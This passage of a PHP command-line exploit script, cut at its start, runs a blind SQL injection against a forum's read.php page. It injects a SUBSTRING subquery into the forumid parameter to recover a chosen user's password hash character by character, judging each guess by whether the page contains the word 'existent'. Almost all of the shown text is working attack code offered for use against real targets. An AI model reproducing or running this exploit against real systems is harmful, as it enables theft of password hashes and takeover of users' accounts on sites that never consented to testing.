\n\n", $argv[0]); exit; } list($sploit, $target, $username, $topicid) = $argv; $charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $pos = 1; echo "[~] Password Hash : "; while($pos != 33) { for($i = 0; $i <= count($charsArr); $i++) { $query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--"; $source = file_get_contents($target . $query); if(!eregi('existent', $source)) { printf("%s", chr($charsArr[$i])); $pos++; break; } flush(STDOUT); } } echo "\n[~] Done\n\n"; ?>